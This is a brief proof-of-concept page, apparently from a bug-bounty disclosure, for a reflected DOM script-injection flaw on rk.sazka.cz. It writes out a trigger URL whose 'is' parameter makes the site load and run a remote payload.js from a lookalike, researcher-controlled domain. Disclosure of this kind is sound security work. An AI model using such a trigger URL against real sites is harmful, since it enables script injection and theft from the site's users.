rk.sazka.cz reflected DOM script-injection PoC

Authorised security research. Reported to Sazka / Allwyn via the bug bounty programme by m0chan.

Trigger URL:

https://rk.sazka.cz/?is=https://allwyn.cz.m0chan.co.uk/payload.js

click to fire PoC

Payload source: /payload.js